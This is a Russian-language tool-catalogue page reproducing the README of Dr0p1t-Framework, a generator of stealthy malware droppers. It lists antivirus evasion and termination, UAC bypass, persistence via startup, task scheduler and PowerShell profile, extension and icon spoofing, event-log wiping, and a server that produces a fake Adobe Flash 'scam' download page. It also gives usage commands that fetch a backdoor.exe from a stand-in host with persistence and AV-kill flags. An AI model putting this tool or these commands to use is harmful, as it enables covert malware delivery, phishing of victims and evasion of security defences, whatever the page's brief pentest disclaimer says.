Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Dr0p1t-Framework — Фреймворк, который создает продвинутого скрытного дроппера, обходящего большинство антивирусов и обладающего множеством трюков. | Kitploit
Инструменты/GitHubGitHub/d4vinci/dr0p1t-framework
Повышение привилегийГенерация полезной нагрузкиМеханизмы персистентностиЭксплуатацияОбход IDS/IPSФорензикаФишингАнализ вредоносных программКомандование и УправлениеСоциальная инженерияРазработка Полезной НагрузкиАнти-Бот
1.5k38767 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Archived
GitHubd4vinci/dr0p1t-framework

Dr0p1t-Framework

Фреймворк, который создает продвинутого скрытного дроппера, обходящего большинство антивирусов и обладающего множеством трюков.

Репозиторий

Not maintained currently (Wait for the next version)


Dr0p1t-Framework n0where best cybersecurity tools Python 3.5 Python 2.7 Build Status

Вы когда-нибудь слышали о троянских дропперах? Коротко: дроппер — это тип вредоносного ПО, которое загружает другие вредоносные программы, а Dr0p1t даёт вам возможность создать скрытный дроппер, обходящий большинство антивирусов и обладающий множеством трюков (Поверьте мне :D) ;)

Возможности

+ Свойства создаваемого исполняемого файла:

  • Размер исполняемого файла меньше по сравнению с другими дропперами, созданными тем же способом.
  • Загружает исполняемый файл на целевую систему и выполняет его незаметно..
  • Функция самоуничтожения — дроппер завершит свою работу и удалит себя после выполнения задачи.
  • Обход судебной экспертизы дисков: все файлы, созданные дроппером, а также сам дроппер очищают своё содержимое перед удалением.
  • Очистка журнала событий после завершения.

+ Свойства фреймворка:

  • Работает с Windows, Linux и теперь поддерживает OSX (Спасибо @sm4sh3r)
  • Функция Dr0p1t-Server (бета) — теперь можно работать из браузера См. как работать с Dr0p1t-Server
  • Dr0p1t-Server имеет опцию скама (бета) См. как работать с Dr0p1t-Server

+ Модули:

  • Поиск и завершение антивируса перед запуском вредоносного ПО.
  • Возможность отключения UAC.
  • Возможность запуска вашего вредоносного ПО от имени администратора.
  • Полная подмена: подмена иконки и расширения файла на любые, какие вы захотите.
  • Поддержка ZIP-файлов — теперь вы можете сжать ваш исполняемый файл в zip перед загрузкой.
  • Запуск пользовательского (batch|powershell|vbs) файла перед запуском исполняемого.
  • При запуске PowerShell-скриптов можно обойти политику выполнения.
  • Использование UPX для сжатия дроппера после его создания.

+Модули постоянства:

  • Добавление исполняемого файла в автозагрузку после загрузки.
  • Добавление исполняемого файла в планировщик задач после загрузки (UAC не важен).
  • Добавление вашего файла в профиль пользователя PowerShell, чтобы ваш файл загружался и запускался каждый раз при запуске powershell.exe, если его нет.

Скриншоты

На Windows

Подробнее

На Linux (Kali linux)

Подробнее

На OSX

Всё ещё не полностью протестировано! Нужны участники и тестировщики 😄

Меню справки

root@kitploit:~
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

Примеры

root@kitploit:~
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Предварительные требования

  • Python 2 или Python 3.

Рекомендуемая версия для Python 2 — 2.7.x, для Python 3 — 3.5.x. Не используйте 3.6, так как она ещё не поддерживается PyInstaller.

Необходимые зависимости для Linux

  • apt
  • Остальные будут установлены из файла install.sh

Примечание: необходим root-доступ

Необходимые зависимости для Windows

  • pip
  • Модули из файла windows_requirements.txt

Установка

Существует список официальных видео по установке и использованию Dr0p1t: Плейлист

  • На Linux
root@kitploit:~
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • На Windows (после загрузки ZIP и его распаковки)
root@kitploit:~
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

Примечание: в Python 2.7 нет pip, поэтому сначала установите его из скрипта get-pip.py [Гуглите]

Протестировано на:

  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Работа с Dr0p1t-Server

Примечание: сервер всё ещё в бета-версии, имеет много функций для добавления, а также лучший дизайн [Нужен дизайнер для участия :D]

Предварительные требования

  • Стабильное интернет-соединение.
  • Порт 5000 не занят, и брандмауэр настроен так, чтобы не блокировать подключения к нему.

Установка и запуск сервера

На Linux и Windows после установки Dr0p1t, выполнив указанные выше шаги, установите модули из server_requirements.txt с помощью pip, например:

root@kitploit:~
python -m pip install -r server_requirements.txt

Теперь запустим наш серверный скрипт:

root@kitploit:~
python Dr0p1t_Server.py

После запуска серверного скрипта он начнёт прослушивать все подключения к порту 5000, используя flask.

Чтобы использовать сервер со своего устройства, откройте в браузере 127.0.0.1:5000 или [Ваш IP]:5000.

Для открытия с других устройств в локальной сети откройте [Ваш локальный IP]:5000, а для других устройств в глобальной сети — [Ваш глобальный IP]:5000, но предварительно убедитесь, что вы настроили маршрутизатор на перенаправление порта 5000 на вас.

После открытия страницы сервера вы увидите простой веб-сайт с простым дизайном, запрашивающий необходимые данные См. скриншоты сервера

Затем отправьте данные, они пройдут проверку, после чего будет создан exe-файл, и вы будете перенаправлены на страницу с указанием ссылки для скама.

После перехода по ссылке вы увидите скам для загрузки дроппера, который по умолчанию представляет собой страницу загрузки Adobe Flash. Чтобы заменить скам на свой, замените содержимое файла "Scam.html" своим, но помните о переменных (не удаляйте их).

Скриншоты сервера

Подробнее для Windows Подробнее для Linux

Без распространения скана (Пожалуйста, не сканируйте на virus total:3)

Todo Проверьте эту ссылку

Контакты

  • Twitter

Пожертвования

Если этот инструмент оказался для вас полезным, не стесняйтесь поблагодарить меня, купив мне кофе :)

Coffee

Отказ от ответственности

Dr0p1t Framework не несёт ответственности за неправильное использование и за незаконные цели. Используйте только для пентеста или в образовательных целях!!!

Копирование кода из этого фреймворка или его использование в другом инструменте допускается при условии указания источника 😄

Pull requests всегда приветствуются :D

Скачать инструмент